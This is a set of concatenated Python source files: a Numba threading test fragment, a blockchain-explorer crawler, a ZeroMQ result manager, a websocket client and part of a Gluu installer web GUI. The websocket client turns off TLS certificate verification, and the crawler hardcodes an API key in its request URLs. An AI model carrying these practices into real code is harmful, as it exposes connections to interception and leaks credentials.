py_arr = res_arrays['none', 'none']
for arr in res_arrays.values():
np.testing.assert_equal(arr, py_arr)
# check the maths reconciles
math_arr = np.zeros((M, N))
# there's branches on modulo mask but only NUMBA_NUM_THREADS funcs
for i in range(1, config.NUMBA_NUM_THREADS):
math_arr[i, :] = i
np.testing.assert_equal(math_arr, py_arr)
# this test can only run on OpenMP (providing OMP_MAX_ACTIVE_LEVELS is not
# set or >= 2) and TBB backends
# This test needs at least 3 threads to run, N>=2 for the launch, M>=N+1 for
# the nested function
@skip_parfors_unsupported
@unittest.skipIf(config.NUMBA_NUM_THREADS < 3, "Not enough CPU cores")
def _test_nested_parallelism_3(self):
if threading_layer() == 'workqueue':
self.skipTest("workqueue is not threadsafe")
# check that the right number of threads are present in nesting
# this relies on there being a load of cores present
BIG = 1000000
@njit(parallel=True)
def work(local_nt): # arg is value 3
tid = np.zeros(BIG)
acc = 0
set_num_threads(local_nt) # set to 3 threads
for i in prange(BIG):
acc += 1
tid[i] = _get_thread_id()
return acc, np.unique(tid)
@njit(parallel=True)
def test_func_jit(nthreads):
set_num_threads(nthreads) # set to 2 threads
lens = np.zeros(nthreads)
total = 0
for i in prange(nthreads):
my_acc, tids = work(nthreads + 1) # call with value 3
lens[i] = len(tids)
total += my_acc
return total, np.unique(lens)
NT = 2
expected_acc = BIG * NT
expected_thread_count = NT + 1
got_acc, got_tc = test_func_jit(NT)
self.assertEqual(expected_acc, got_acc)
self.check_mask(expected_thread_count, got_tc)
def test_guvectorize(nthreads):
@guvectorize(['int64[:], int64[:]'],
'(n), (n)',
nopython=True,
target='parallel')
def test_func_guvectorize(total, lens):
my_acc, tids = work(nthreads + 1)
lens[0] = len(tids)
total[0] += my_acc
total = np.zeros((nthreads, 1), dtype=np.int64)
lens = np.zeros(nthreads, dtype=np.int64).reshape((nthreads, 1))
test_func_guvectorize(total, lens)
# vectorize does not reduce, so total is summed
return total.sum(), np.unique(lens)
got_acc, got_tc = test_guvectorize(NT)
self.assertEqual(expected_acc, got_acc)
self.check_mask(expected_thread_count, got_tc)
@skip_parfors_unsupported
@unittest.skipIf(config.NUMBA_NUM_THREADS < 2, "Not enough CPU cores")
@unittest.skipIf(not sys.platform.startswith('linux'), "Linux only")
def _test_threadmask_across_fork(self):
forkctx = multiprocessing.get_context('fork')
@njit
def foo():
return get_num_threads()
def wrap(queue):
queue.put(foo())
mask = 1
self.assertEqual(foo(), config.NUMBA_NUM_THREADS)
set_num_threads(mask)
self.assertEqual(foo(), mask)
shared_queue = forkctx.Queue()
# check TLS slot inheritance in fork
p = forkctx.Process(target=wrap, args=(shared_queue,))
p.start()
p.join()
self.assertEqual(shared_queue.get(), mask)
def tearDown(self):
set_num_threads(config.NUMBA_NUM_THREADS)
class TestNumThreadsBackends(TestInSubprocess, TestCase):
_class = TestNumThreads
_DEBUG = False
# 1 is mainly here to ensure tests skip correctly
num_threads = [i for i in [1, 2, 4, 8, 16] if i <= config.NUMBA_NUM_THREADS]
def run_test_in_separate_process(self, test, threading_layer, num_threads):
env_copy = os.environ.copy()
env_copy['NUMBA_THREADING_LAYER'] = str(threading_layer)
env_copy['NUMBA_NUM_THREADS'] = str(num_threads)
cmdline = [sys.executable, "-m", "numba.runtests", "-v", test]
return self.run_cmd(cmdline, env_copy)
@classmethod
def _inject(cls, name, backend, backend_guard, num_threads):
themod = cls.__module__
thecls = cls._class.__name__
injected_method = '%s.%s.%s' % (themod, thecls, name)
def test_template(self):
o, e = self.run_test_in_separate_process(injected_method, backend,
num_threads)
if self._DEBUG:
print('stdout:\n "%s"\n stderr:\n "%s"' % (o, e))
self.assertIn('OK', e)
self.assertTrue('FAIL' not in e)
self.assertTrue('ERROR' not in e)
m = re.search(r"\.\.\. skipped '(.*?)'", e)
if m:
self.skipTest(m.group(1))
injected_test = "%s_%s_%s_threads" % (name[1:], backend, num_threads)
setattr(cls, injected_test,
tag('long_running')(backend_guard(test_template)))
@classmethod
def generate(cls):
for name in cls._class.__dict__.copy():
for backend, backend_guard in cls.backends.items():
for num_threads in cls.num_threads:
if not name.startswith('_test_'):
continue
cls._inject(name, backend, backend_guard, num_threads)
TestNumThreadsBackends.generate()
if __name__ == '__main__':
unittest.main()
|
UIC_Spider.py | #coding:utf-8
from Html_Downloader import HtmlDownloader
from Html_Parser import HtmlParser
from Data_Output import DataOutput
import csv
from multiprocessing import Process
import time
class SpiderMan(object):
def __init__(self):
self.downloader = HtmlDownloader()
self.parser = HtmlParser()
self.output = DataOutput()
def crawl(self,filename):
num = ["takeoff", "number", "timestamp", "hash",
"parentHash", "author", "authorWalletId", "minerReward", "difficulty",
"totalDifficulty", "nonce", "extraData", "udid", "lat", "lgt",
"sha3Uncles", "transactionsRoot", "stateRoot", "miner", "size",
"gasLimit", "gasUsed", "transactionsCount", "unclesCount"]
try:
with open(filename, 'r') as fr1:
fr_reader = csv.reader(fr1)
with open('uicbase_old.csv', 'w', newline='') as fw_old:
fw_old_writer = csv.writer(fw_old)
fw_old_writer.writerows(fr_reader)
print('写入备份文件uicbase_old.csv')
except Exception as e:
print(e)
# 获得旧文件中最后一个编号
try:
fr = open('uicbase_old.csv', 'r')
fr_reader = csv.reader(fr)
head_row = next(fr_reader)
first_row = next(fr_reader)
last_number = int(first_row[1])
fr.close()
print('last_number=%s' % last_number)
except Exception as e:
last_number = 1189
print(e)
print('last_number=%s' % last_number)
ff = open(filename, 'w', newline='')
ff_writer = csv.writer(ff)
ff_writer.writerow(num)
ff.close()
appkey='9d423c8509bba0591d8dc73521270674'
page=1
page_size=400
root_url = 'http://explorer.uicbase.io/expApi/blocksInfo' \
'?appkey=%s' \
'&page=%s' \
'&pageSize=%s' % (appkey, page,page_size)
rank_content = self.downloader.download(root_url)
#print(rank_content)
current_page=self.parser.parser_json_page(rank_content)
#print(current_page)
total_page=self.parser.parser_json_totallines(rank_content)
if page_size!=20:
total_page = int(total_page/(total_page/page_size))
print('total_page=%s'%total_page)
#print('type')
#print(type(total_page))
# 构造一个链接
for page in range(total_page):
page+=1
try:
#t = time.strftime("%Y%m%d%H%M%S3282", time.localtime())
root_url = 'http://explorer.uicbase.io/expApi/blocksInfo' \
'?appkey=%s' \
'&page=%s' \
'&pageSize=400' % (appkey,page)
rank_content = self.downloader.download(root_url)
if rank_content !=None:
#print(rank_content)
nums=self.parser.parser_json_datum(rank_content)
#print(nums[-1])
print('挖矿写入第:%s页'%page)
if nums[-1][1]>last_number:
#print('data_writerows')
self.output.data_writerows(filename, nums)
else:
#print('data_writerow')
done = False
for num in nums:
if num[1]>last_number:
self.output.data_writerow(filename,num)
else:
print('挖矿数据下载完成')
done = True
break
if done == True:
break
else:
#return False
pass
except Exception as e:
print(e)
return False
try:
fw = open(filename, 'a', newline='')
fw_writer = csv.writer(fw)
fr = open('uicbase_old.csv', 'r')
reader = csv.reader(fr)
next(reader)
fw_writer.writerows(reader)
fr.close()
fw.close()
except Exception as e:
print(e)
def crawl_deal(self,filename):
num = ["blockNumber", "txhash", "timestamp", "from", "to", "value", "fee",
"nonce", "data", "fromWalletId", "toWalletId", "gas", "gasPrice"]
try:
with open(filename, 'r') as fr1:
fr_reader = csv.reader(fr1)
with open('uicbase_deal_old.csv', 'w', newline='') as fw_old:
fw_old_writer = csv.writer(fw_old)
fw_old_writer.writerows(fr_reader)
print('写入备份文件uicbase_deal_old.csv')
except Exception as e:
print(e)
# 获得旧文件中最近时间
try:
fr = open('uicbase_deal_old.csv', 'r')
fr_reader = csv.reader(fr)
head_row = next(fr_reader)
first_row = next(fr_reader)
fr.close()
#print('type(first_row[2])=%s'%type(first_row[2]))
last_time = int(first_row[2])
#print('old_deal_last_time=%s' % last_time)
except Exception as e:
last_time = 1522029555
print(e)
print('deal_last_time=%s' % last_time)
ff = open(filename, 'w', newline='')
ff_writer = csv.writer(ff)
ff_writer.writerow(num)
ff.close()
page =1
pageSize=200
root_url = 'http://explorer.uicbase.io/expApi/txsInfo' \
'?appkey=9d423c8509bba0591d8dc73521270674' \
'&page=%s' \
'&pageSize=%s' \
'&blockNumber=NaN'%(page,pageSize)
deal_content=self.downloader.download(root_url)
#current_page = self.parser.parser_json_deal_page(deal_content)
# print(current_page)
total_page = self.parser.parser_json_deal_totallines(deal_content)
if pageSize!=20:
total_page = int(total_page/(total_page/pageSize))
print('deal_total_page=%s' % total_page)
for page in range(total_page):
page += 1
try:
root_url = 'http://explorer.uicbase.io/expApi/txsInfo' \
'?appkey=9d423c8509bba0591d8dc73521270674' \
'&page=%s' \
'&pageSize=%s' \
'&blockNumber=NaN' % (page, pageSize)
deal_content = self.downloader.download(root_url)
if deal_content!=None:
# print(rank_content)
nums = self.parser.parser_json_deal_datum(deal_content)
#print(nums[-1][2])
print('交易数据写入第:%s页' % page)
if nums[-1]!=None:
#print(type(nums[-1][2]))
#print(type(last_time))
if nums[-1][2] > last_time:
#print('data_writerows')
self.output.data_writerows(filename, nums)
else:
#print('data_writerow')
done=False
for num in nums:
if num[2] > last_time:
self.output.data_writerow(filename, num)
else:
print('deal数据下载完成')
done=True
break
if done==True:
break
else:
print('nums[-1]=%s'%nums[-1][2])
else:
pass
except Exception as e:
print('crawl_deal:%s'%e)
return False
try:
fw = open(filename, 'a', newline='')
fw_writer = csv.writer(fw)
fr = open('uicbase_deal_old.csv', 'r')
reader = csv.reader(fr)
next(reader)
fw_writer.writerows(reader)
fr.close()
fw.close()
except Exception as e:
print(e)
if __name__=='__main__':
spider_man = SpiderMan()
filename = '挖矿数据.csv'
filename_deal ='交易数据.csv'
#spider_man.crawl_deal(filename_deal)
#spider_man.crawl(filename)
P=Process(target= spider_man.crawl,args=(filename,))
print('P1 will start')
P.start()
P = Process(target= spider_man.crawl_deal,args=(filename_deal,))
print('P2 will start')
P.start()
P.join()
print('---------END----------')
|
cache_result_manager.py | #!/usr/bin/python
import sys
import zmq
import time
import signal
import optparse
from multiprocessing import Process
# The "results_manager" function receives each result from multiple workers,
# and prints those results. When all results have been received, it signals
# the worker processes to shut down.
def result_manager(tm_between_msgs, wake_poll, result_server, ventilator_server, v_rm_port, rm_ports):
# Initialize a zeromq context
context = zmq.Context()
# Set up a channel to receive results
results_receiver = context.socket(zmq.PULL)
results_receiver.bind("tcp://%s:%d" % (result_server, rm_ports[0]))
# Set up a channel to receive ventilator messages over
v_receiver = context.socket(zmq.SUB)
v_receiver.connect("tcp://%s:%d" % (ventilator_server, v_rm_port))
v_receiver.setsockopt(zmq.SUBSCRIBE, "")
# Set up a channel to send control commands
control_sender = context.socket(zmq.PUB)
control_sender.bind("tcp://%s:%d" % (result_server, rm_ports[1]))
# Set up a poller to multiplex the results_receiver and v_receiver channels
poller = zmq.Poller()
poller.register(results_receiver, zmq.POLLIN)
poller.register(v_receiver, zmq.POLLIN)
last_msg_tm = time.time()
msg_cnt = 0
v_message = None
# Time check failsafe... If we don't get a message in X seconds, we finish up.
def wake_handler(signum, frame):
tm_diff = time.time() - last_msg_tm
print("Time Diff %d") % (tm_diff)
if tm_diff >= tm_between_msgs:
print("Result Manager timed out after %d seconds waiting for messages!") % (tm_diff)
# Signal to all workers that we are finsihed
control_sender.send("FINISHED")
time.sleep(5)
sys.exit()
# Set the signal handler
signal.signal(signal.SIGALRM, wake_handler)
# Write output to log file
#f = open('result_manager.log', 'w')
while True:
socks = dict(poller.poll())
if socks.get(results_receiver) == zmq.POLLIN:
signal.alarm(0) # May not actually need to clear the alarm, but I do
result_message = results_receiver.recv_json()
msg_cnt = msg_cnt + 1
print "Worker %s:%s answered: %s message count: %d\n %s" % (result_message['worker'], result_message['host'], result_message['result'], msg_cnt, result_message['url'])
#f.write("Worker %i answered: %i" % (result_message['worker'], result_message['result']))
last_msg_tm = time.time()
signal.alarm(wake_poll)
# If a message came over the v_receiver channel get it.
if socks.get(v_receiver) == zmq.POLLIN:
signal.alarm(0) # May not actually need to clear the alarm, but I do
v_message = v_receiver.recv_json()
print("Received %d count from ventilator current count is %d") % (v_message['count'], msg_cnt)
signal.alarm(wake_poll)
# if msg_cnt >= v_message count , break and shut down the workers.
if v_message and msg_cnt >= v_message['count']:
print("Result Manager received last message, quitting!")
break
# Signal to all workers that we are finsihed
control_sender.send("FINISHED")
#f.close()
time.sleep(5)
if __name__ == "__main__":
parser = optparse.OptionParser('usage %prog -t TIME_BETWEEN_MESSAGES -w WAKE_ALARM -r RESULT_SERVER -v VENTILATO_SERVER', add_help_option=True)
parser.add_option('-t', '--tm-between-msgs', action="store", type="int", dest="tm_between_msgs", default=10, help="Idle time between messages before the result manager assumes its finished.")
parser.add_option('-w', '--wake-alarm', action="store", type="int", dest="wake_poll", default=30, help="An alarm to wake the result server in case of unmatching message counts.")
parser.add_option('-r', '--result-server', action="store", type="string", dest="result_server", help="Server where the worker results are sent.")
parser.add_option('-v', '--ventilator-server', action="store", type="string", dest="ventilator_server", help="Server that queues the urls.")
parser.add_option('-p', '--rm-ports', action="store", type="string", dest="rm_ports", default="5558:5559", help="Result Manager ports for worker communication.")
parser.add_option('-c', '--v_rm-port', action="store", type="int", dest="v_rm_port", default=5560, help="Result Manager communication port.")
(options, args) = parser.parse_args()
tm_between_msgs = options.tm_between_msgs
wake_poll = options.wake_poll
result_server = options.result_server
ventilator_server = options.ventilator_server
rm_ports = map(int, options.rm_ports.split(':'))
v_rm_port = options.v_rm_port
if not(result_server and ventilator_server):
print(parser.usage)
sys.exit(1)
# Fire up our result manager...
result_manager = Process(target=result_manager, args=(tm_between_msgs, wake_poll, result_server, ventilator_server, v_rm_port, rm_ports))
result_manager.start()
|
websocket_client.py | import json
import logging
import socket
import ssl
import sys
import traceback
from datetime import datetime
from threading import Lock, Thread
from time import sleep
from typing import Optional
import websocket
from quantitativetrader.trader.utility import get_file_logger
class WebsocketClient:
"""
Websocket API
After creating the client object, use start() to run worker and ping threads.
The worker thread connects websocket automatically.
Use stop to stop threads and disconnect websocket before destroying the client
object (especially when exiting the programme).
Default serialization format is json.
Callbacks to overrides:
* unpack_data
* on_connected
* on_disconnected
* on_packet
* on_error
After start() is called, the ping thread will ping server every 60 seconds.
If you want to send anything other than JSON, override send_packet.
"""
def __init__(self):
"""Constructor"""
self.host = None
self._ws_lock = Lock()
self._ws = None
self._worker_thread = None
self._ping_thread = None
self._active = False
self.proxy_host = None
self.proxy_port = None
self.ping_interval = 60 # seconds
self.header = {}
self.logger: Optional[logging.Logger] = None
# For debugging
self._last_sent_text = None
self._last_received_text = None
def init(self,
host: str,
proxy_host: str = "",
proxy_port: int = 0,
ping_interval: int = 60,
header: dict = None,
log_path: Optional[str] = None,
):
"""
:param host:
:param proxy_host:
:param proxy_port:
:param header:
:param ping_interval: unit: seconds, type: int
:param log_path: optional. file to save log.
"""
self.host = host
self.ping_interval = ping_interval # seconds
if log_path is not None:
self.logger = get_file_logger(log_path)
self.logger.setLevel(logging.DEBUG)
if header:
self.header = header
if proxy_host and proxy_port:
self.proxy_host = proxy_host
self.proxy_port = proxy_port
def start(self):
"""
Start the client and on_connected function is called after webscoket
is connected succesfully.
Please don't send packet untill on_connected fucntion is called.
"""
self._active = True
self._worker_thread = Thread(target=self._run)
self._worker_thread.start()
self._ping_thread = Thread(target=self._run_ping)
self._ping_thread.start()
def stop(self):
"""
Stop the client.
"""
self._active = False
self._disconnect()
def join(self):
"""
Wait till all threads finish.
This function cannot be called from worker thread or callback function.
"""
self._ping_thread.join()
self._worker_thread.join()
def send_packet(self, packet: dict):
"""
Send a packet (dict data) to server
override this if you want to send non-json packet
"""
text = json.dumps(packet)
self._record_last_sent_text(text)
return self._send_text(text)
def _log(self, msg, *args):
logger = self.logger
if logger:
logger.debug(msg, *args)
def _send_text(self, text: str):
"""
Send a text string to server.
"""
ws = self._ws
if ws:
ws.send(text, opcode=websocket.ABNF.OPCODE_TEXT)
self._log('sent text: %s', text)
def _send_binary(self, data: bytes):
"""
Send bytes data to server.
"""
ws = self._ws
if ws:
ws._send_binary(data)
self._log('sent binary: %s', data)
def _create_connection(self, *args, **kwargs):
""""""
return websocket.create_connection(*args, **kwargs)
def _ensure_connection(self):
""""""
triggered = False
with self._ws_lock:
if self._ws is None:
self._ws = self._create_connection(
self.host,
sslopt={"cert_reqs": ssl.CERT_NONE},
http_proxy_host=self.proxy_host,
http_proxy_port=self.proxy_port,
header=self.header
)
triggered = True
if triggered:
self.on_connected()
def _disconnect(self):
"""
"""
triggered = False
with self._ws_lock:
if self._ws:
ws: websocket.WebSocket = self._ws
self._ws = None
triggered = True
if triggered:
ws.close()
self.on_disconnected()
def _run(self):
"""
Keep running till stop is called.
"""
try:
while self._active:
try:
self._ensure_connection()
ws = self._ws
if ws:
text = ws.recv()
# ws object is closed when recv function is blocking
if not text:
self._disconnect()
continue
self._record_last_received_text(text)
try:
data = self.unpack_data(text)
except ValueError as e:
print("websocket unable to parse data: " + text)
raise e
self._log('recv data: %s', data)
self.on_packet(data)
# ws is closed before recv function is called
# For socket.error, see Issue #1608
except (
websocket.WebSocketConnectionClosedException,
websocket.WebSocketBadStatusException,
socket.error
):
self._disconnect()
# other internal exception raised in on_packet
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._disconnect()
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._disconnect()
@staticmethod
def unpack_data(data: str):
"""
Default serialization format is json.
override this method if you want to use other serialization format.
"""
return json.loads(data)
def _run_ping(self):
""""""
while self._active:
try:
self._ping()
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
# self._run() will reconnect websocket
sleep(1)
for i in range(self.ping_interval):
if not self._active:
break
sleep(1)
def _ping(self):
""""""
ws = self._ws
if ws:
ws.send("ping", websocket.ABNF.OPCODE_PING)
@staticmethod
def on_connected():
"""
Callback when websocket is connected successfully.
"""
pass
@staticmethod
def on_disconnected():
"""
Callback when websocket connection is lost.
"""
pass
@staticmethod
def on_packet(packet: dict):
"""
Callback when receiving data from server.
"""
pass
def on_error(self, exception_type: type, exception_value: Exception, tb):
"""
Callback when exception raised.
"""
sys.stderr.write(
self.exception_detail(exception_type, exception_value, tb)
)
return sys.excepthook(exception_type, exception_value, tb)
def exception_detail(
self, exception_type: type, exception_value: Exception, tb
):
"""
Print detailed exception information.
"""
text = "[{}]: Unhandled WebSocket Error:{}\n".format(
datetime.now().isoformat(), exception_type
)
text += "LastSentText:\n{}\n".format(self._last_sent_text)
text += "LastReceivedText:\n{}\n".format(self._last_received_text)
text += "Exception trace: \n"
text += "".join(
traceback.format_exception(exception_type, exception_value, tb)
)
return text
def _record_last_sent_text(self, text: str):
"""
Record last sent text for debug purpose.
"""
self._last_sent_text = text[:1000]
def _record_last_received_text(self, text: str):
"""
Record last received text for debug purpose.
"""
self._last_received_text = text[:1000]
|
gui.py | #!/usr/bin/python3
import json
import os
import threading
import time
import textwrap
import subprocess
from bottle import Bottle
from bottle import redirect
from bottle import template
from bottle import TEMPLATE_PATH
from bottle import request
from bottle import response
from distutils.util import strtobool
from queue import Queue
from messages import msg
template_path = os.path.abspath('./templates/web_setup')
TEMPLATE_PATH.insert(0, template_path)
# install types
NONE = 0
LOCAL = '1'
REMOTE = '2'
COMPLETED = -99
ERROR = -101
middleware = lambda functions: lambda caller: lambda *args, **kwargs: next(
filter(None, map(lambda g: g(*args, **kwargs), functions)),
caller(*args, **kwargs)
)
def has_body(*args, **kwargs):
if not request.json:
response.status = 400
return {'error': 'ValidationError',
'error_message': 'Body is required (and must be JSON).'}
def body_req(required):
def inner(*args, **kwargs):
data = {
'status': True
}
errors = []
for i in required:
if request.forms.get(i) is None or request.forms.get(i) == '':
errors.append({
'field': i, 'message': '{} is required.'.format(i)})
if i == 'hostname' and request.forms.get(i) == 'localhost':
errors.append({
'field': i, 'message': msg.enter_hostname_local})
if errors:
data.update({'status': False})
data.update({'errors': errors})
return dict(data)
return inner
def validate_host(fields):
def inner(*args, **kwargs):
data = {
'status': True
}
errors = []
for i in fields:
if request.forms.get(i) is None or request.forms.get(i) == '':
errors.append({
'field': i, 'message': '{} is required.'.format(i)})
if i == 'countryCode' and len(request.forms.get(i)) < 2:
errors.append({
'field': i, 'message': msg.enter_valid_countryCode})
if i == 'oxtrust_admin_password' and len(request.forms.get(i)) < 6:
errors.append({
'field': i, 'message': msg.oxtrust_admin_password_warning})
if errors:
data.update({'status': False})
data.update({'errors': errors})
return dict(data)
return inner
def validate_services(fields):
def inner(*args, **kwargs):
data = {
'status': True
}
errors = []
for i in fields:
if request.forms.get(i) is None or request.forms.get(i) == '':
errors.append({
'field': i, 'message': '{} is required.'.format(i)})
if errors:
data.update({'status': False})
data.update({'errors': errors})
return dict(data)
return inner
class GluuSetupApp:
def __init__(self):
self._app = Bottle()
self.host = '0.0.0.0'
self.port = '8080'
self._routes()
self.exit_reason = str()
self.my_counter = 0
self.do_notify = True
self.install_object = None
self.queue = Queue()
self.requirements = ('file_max', 'mem_size',
'number_of_cpu', 'free_disk_space')
self._confirm_lisence = False
self._myfields = ('lisence_confirm', 'ip', 'hostname',
'city', 'state', 'orgName', 'admin_email',
'countryCode', 'application_max_ram',
'oxtrust_admin_password', 'installHttpd',
'installSaml', 'installOxAuthRP',
'installPassport', 'installGluuRadius', 'installOxd',
'installCasa', 'oxd_url', 'wrends_install',
'wrends_password', 'wrends_hosts', 'cb_install',
'cb_admin', 'cb_password', 'cb_hosts')
self.process = None
self.status = None
self.output = ''
self.error = ''
def start(self):
self._app.run(host=self.host, port=self.port, debug=True)
def _routes(self):
self._app.route('/', ['GET', 'POST'], callback=self.wizard)
self._app.route('/initialize', 'GET', callback=self.initialize)
self._app.route('/install', callback=self.installation)
self._app.route('/storage_selection', ['GET', 'POST'],
callback=self.storage_selection)
self._app.route('/display_summary', ['GET', 'POST'],
callback=self.display_summary)
self._app.route('/installation', ['GET'],
callback=self.install_handler)
self._app.route('/post-installation', 'GET',
callback=self.post_install_handler)
self._app.route('/add-services', 'POST',
callback=self.add_services_handler)
self._app.route('/get-log', 'GET',
callback=self.get_log)
self._app.route('/quit', ['GET', 'POST'],
callback=self.shutdown)
self._app.route('/collect-data/<step>', 'POST',
callback=self.collect_data)
self._app.route('/collect-system-info', 'POST',
callback=self.collect_system_info)
self._app.route('/collect-host', 'POST', callback=self.collect_host)
self._app.route('/collect-services', 'POST',
callback=self.collect_services)
self._app.route('/collect-database', 'POST',
callback=self.collect_database)
self._app.route('/populate-dbbackend', 'GET',
callback=self.populate_dbbackend)
def initialize(self):
if self.install_object.check_installed():
return dict({'installed': True})
fields = {}
if not self.install_object.hostname:
hostname = self.install_object.detect_hostname()
self.install_object.hostname = hostname
for k in self._myfields:
value = getattr(self.install_object, k, None)
if(value):
value = value
if k == 'lisence_confirm':
value = self._confirm_lisence
fields.update({k: value})
return dict(fields)
def wizard(self):
data = {
'msg': msg,
'warning_text': None
}
for sys_req in self.requirements:
cur_val = getattr(msg, 'current_' + sys_req)
req_val = getattr(msg, 'suggested_' + sys_req)
if cur_val < req_val:
data['warning_text'] = getattr(msg,
'insufficient_' + sys_req).format(cur_val, req_val)
if sys_req == 'file_max':
self.exit_reason = data['warning_text']
time.sleep(3.5)
self.shutdown
data['warning_text'] += '. Do you want to continue?'
return template('wizard.tpl', data)
def collect_data(self):
for k, v in request.forms.items():
if k == 'application_max_ram':
v = int(v)
if k == 'lisence_confirm':
self._confirm_lisence = strtobool(v)
continue
setattr(self.install_object, k, v)
def object_response(self, message=None, error=False,
field=None, redirect=False, redirect_url=None):
response = {}
response.update({'status': True})
if error:
response.update({
'status': False,
'errors': {
'field': field,
'message': message
}
})
if redirect:
response.update({'redirect_url': redirect_url})
return dict(response)
@middleware([body_req({'hostname', 'ip', 'lisence_confirm'})])
def collect_system_info(self):
errors = {}
for k, v in request.forms.items():
if v == 'localhost':
errors.update({'hostname': msg.enter_hostname_local})
if k == 'lisence_confirm':
self._confirm_lisence = strtobool(v)
continue
setattr(self.install_object, k, str(v))
return self.object_response()
@middleware([validate_host({
'orgName', 'admin_email', 'city', 'state', 'countryCode',
'application_max_ram', 'oxtrust_admin_password'})])
def collect_host(self):
for k, v in request.forms.items():
if k == 'application_max_ram':
v = int(v)
setattr(self.install_object, k, str(v))
return dict({'status': True})
def collect_services(self):
params = request.forms
for k, v in params.items():
v = str(v) if k == 'oxd_url' else bool(strtobool(v))
setattr(self.install_object, k, v)
if params.installCasa:
if not params.installOxd and not params.oxd_url:
return dict({
'status': False,
'errors': [{
'field': 'oxd_url',
'message': 'Casa Required Oxd'
}]
})
if not params.installOxd:
oxd_server_https = params.oxd_url
oxd_connection_result = self.install_object.check_oxd_server(oxd_server_https)
if oxd_connection_result is not True:
return dict({
'status': False,
'errors': [{
'field': 'oxd_url',
'message': msg.oxd_connection_error.format(oxd_server_https, oxd_connection_result)
}]
})
oxd_hostname, oxd_port = self.install_object.parse_url(oxd_server_https)
oxd_ssl_result = self.install_object.check_oxd_ssl_cert(oxd_hostname)
if oxd_ssl_result:
return dict({
'status': False,
'errors': [{
'field': 'oxd_url',
'message': msg.oxd_ssl_cert_error.format(oxd_ssl_result['CN'], oxd_hostname)
}]
})
self.install_object.oxd_server_https = oxd_server_https
oxd_hostname, oxd_port = self.install_object.parse_url(self.install_object.oxd_server_https)
if not oxd_port:
oxd_port = 8445
self.install_object.templateRenderingDict['oxd_hostname'] = oxd_hostname
self.install_object.templateRenderingDict['oxd_port'] = str(oxd_port)
return dict({'status': True})
def collect_database(self):
params = request.forms
if params.wrends_install == '0':
params.wrends_install = NONE
if params.cb_install == '0':
params.cb_install = NONE
msg.backed_types = []
self.install_object.wrends_install = params.wrends_install
if self.install_object.wrends_install == LOCAL:
self.install_object.ldap_hostname = 'localhost'
self.install_object.ldapPass = params.wrends_password
elif self.install_object.wrends_install == REMOTE:
self.install_object.ldap_hostname = params.wrends_hosts
self.install_object.ldapPass = params.wrends_password
result = self.install_object.check_remote_ldap(
params.wrends_hosts,
self.install_object.ldap_binddn,
params.wrends_password)
if not result['result']:
return dict({
'status': False,
'errors': {
'field': 'wrends_hosts',
'message': result['reason']
}
})
self.install_object.cb_install = params.cb_install
if self.install_object.cb_install == LOCAL:
self.install_object.couchbase_hostname = 'localhost'
self.install_object.cb_password = params.cb_password
elif self.install_object.cb_install == REMOTE:
self.install_object.couchbase_hostname = params.cb_hosts
self.install_object.couchebaseClusterAdmin = params.cb_admin
self.install_object.cb_password = params.cb_password
result = self.install_object.test_cb_servers(params.cb_hosts)
if not result['result']:
return dict({
'status': False,
'errors': [{
'field': 'cb_hosts',
'message': result['reason']
}]
})
if self.install_object.cb_install is not NONE:
self.install_object.cache_provider_type = 'NATIVE_PERSISTENCE'
self.install_object.add_couchbase_post_messages()
if self.install_object.wrends_install is not NONE and \
not self.install_object.checkPassword(
self.install_object.ldapPass):
return dict({
'status': False,
'errors': [{
'field': 'wrends_password',
'message': msg.weak_password.format('Wrends')
}]
})
if self.install_object.cb_install is not NONE and \
not self.install_object.checkPassword(
self.install_object.cb_password):
return dict({
'status': False,
'errors': [{
'field': 'cb_password',
'message': msg.weak_password.format('Couchbase Server')
}]
})
if self.install_object.wrends_install is not NONE or \
self.install_object.cb_install is not NONE:
if self.install_object.wrends_install is not NONE and \
self.install_object.cb_install is not NONE:
self.install_object.persistence_type = 'hybrid'
return dict({
'status': True,
'redirect_url': '/storage_selection'
})
else:
storage_list = list(
self.install_object.couchbaseBucketDict.keys())
storage = 'ldap'
if self.install_object.cb_install is not NONE:
storage = 'couchbase'
for s in storage_list:
self.install_object.mappingLocations[s] = storage
self.install_object.persistence_type = storage
return dict({
'status': True,
'redirect_url': '/display_summary'
})
else:
return dict({
'status': False,
'errors': [{
'field': 'wrends_install',
'message': msg.notify_select_backend
}]
})
return dict({'status': True})
def populate_dbbackend(self):
fields = {}
if self.install_object.wrends_install == LOCAL:
if not self.install_object.ldapPass:
fields['wrends_password'] = self.install_object.oxtrust_admin_password
else:
fields['wrends_password'] = self.install_object.ldapPass
fields['wrends_hosts'] = self.install_object.ldap_hostname
if self.install_object.cb_install == LOCAL:
if not self.install_object.cb_password:
fields['cb_password'] = self.install_object.oxtrust_admin_password
fields['cb_hosts'] = self.install_object.couchbase_hostname
fields['cb_admin'] = self.install_object.couchebaseClusterAdmin
return dict(fields)
def storage_selection(self):
data = {
'title': msg.StorageSelectionForm_label,
'note': msg.unselected_storages
}
if request.method == 'POST':
storage_list = list(self.install_object.couchbaseBucketDict.keys())
for i, s in enumerate(storage_list):
if i in [k for k, v in enumerate(request.forms)]:
self.install_object.mappingLocations[s] = 'ldap'
else:
self.install_object.mappingLocations[s] = 'couchbase'
return redirect('display_summary')
choices = []
for i, s in enumerate(self.install_object.couchbaseBucketDict.keys()):
choice = {'key': i, 'label': s}
if self.install_object.mappingLocations[s] == 'ldap':
choice.update({'checked': 'checked'})
choices.append(choice)
data.update({'choices': choices})
return template('storage_selection', data)
def display_summary(self):
data = {
'title': msg.DisplaySummaryForm_label,
}
if self.install_object.wrends_install is not NONE \
and self.install_object.cb_install is not NONE:
data.update({'back_url': '/storage_selection'})
else:
data.update({'back_url': '/'})
if request.method == 'POST':
self.install_object.check_properties()
return redirect('/installation')
myfields_1 = ("hostname", "orgName", "os_type", "city", "state",
"countryCode", "application_max_ram")
myfields_2 = ("installOxAuth", "installOxTrust", "installHttpd",
"installSaml", "installOxAuthRP", "installPassport",
"installGluuRadius", "installOxd", "installCasa",
"java_type", "backend_types", "wrends_storages")
specs = {}
for field in myfields_1:
label = getattr(msg, field + '_label')
value = getattr(self.install_object, field)
specs[label] = value
data['specs'] = specs
packages = {}
for field in myfields_2:
label = getattr(msg, field+'_label')
if field == 'backend_types':
bt_ = []
if self.install_object.wrends_install == LOCAL:
bt_.append('wrends')
elif self.install_object.wrends_install == REMOTE:
